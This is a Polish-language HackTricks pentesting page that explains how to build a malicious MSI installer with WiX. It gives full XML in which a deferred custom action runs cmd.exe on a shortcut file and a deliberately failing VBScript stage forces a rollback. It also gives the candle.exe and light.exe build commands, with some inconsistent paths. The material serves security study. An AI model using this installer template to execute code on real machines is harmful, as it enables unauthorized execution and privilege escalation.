Create MSI with WIX

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Tworzenie złośliwego MSI i uzyskiwanie uprawnień roota

Tworzenie instalatora MSI zostanie wykonane przy użyciu narzędzi wixtools, a konkretnie wixtools zostanie wykorzystane. Warto wspomnieć, że próbowano również alternatywnych narzędzi do tworzenia MSI, ale nie były one skuteczne w tym konkretnym przypadku.

Aby w pełni zrozumieć przykłady użycia wix MSI, zaleca się zapoznanie się z tą stroną. Znajdziesz tutaj różne przykłady, które demonstrują użycie wix MSI.

Celem jest wygenerowanie MSI, które wykonuje plik lnk. Aby to osiągnąć, można użyć następującego kodu XML (xml stąd):

<?xml version="1.0"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name"
Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
<Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
<Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>
<Directory Id="TARGETDIR" Name="SourceDir">
<Directory Id="ProgramFilesFolder">
<Directory Id="INSTALLLOCATION" Name="Example">
<Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
</Component>
</Directory>
</Directory>
</Directory>
<Feature Id="DefaultFeature" Level="1">
<ComponentRef Id="ApplicationFiles"/>
</Feature>
<Property Id="cmdline">cmd.exe /C "c:\users\public\desktop\shortcuts\rick.lnk"</Property>
<CustomAction Id="Stage1" Execute="deferred" Directory="TARGETDIR" ExeCommand='[cmdline]' Return="ignore"
Impersonate="yes"/>
<CustomAction Id="Stage2" Execute="deferred" Script="vbscript" Return="check">
fail_here
</CustomAction>
<InstallExecuteSequence>
<Custom Action="Stage1" After="InstallInitialize"></Custom>
<Custom Action="Stage2" Before="InstallFiles"></Custom>
</InstallExecuteSequence>
</Product>
</Wix>

Warto zauważyć, że element Package zawiera atrybuty takie jak InstallerVersion i Compressed, określające wersję instalatora i wskazujące, czy pakiet jest skompresowany czy nie.

Proces tworzenia polega na wykorzystaniu narzędzia candle.exe z wixtools do wygenerowania obiektu wix z pliku msi.xml. Należy wykonać następujące polecenie:

candle.exe -out C:\tem\wix C:\tmp\Ethereal\msi.xml

Dodatkowo, warto wspomnieć, że w poście dostarczono obraz przedstawiający polecenie i jego wynik. Możesz się do niego odwołać w celu uzyskania wizualnego wsparcia.

Ponadto, zostanie użyte narzędzie light.exe, kolejne narzędzie z wixtools, do utworzenia pliku MSI z obiektu wix. Polecenie do wykonania jest następujące:

light.exe -out C:\tm\Ethereal\rick.msi C:\tmp\wix

Podobnie jak w poprzedniej komendzie, do posta dołączony jest obraz ilustrujący komendę i jej wynik.

Należy jednak zauważyć, że chociaż ten podsumowanie ma na celu dostarczenie wartościowych informacji, zaleca się odwołanie się do oryginalnego posta, aby uzyskać bardziej szczegółowe informacje i dokładne instrukcje.

Odwołania

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Last updated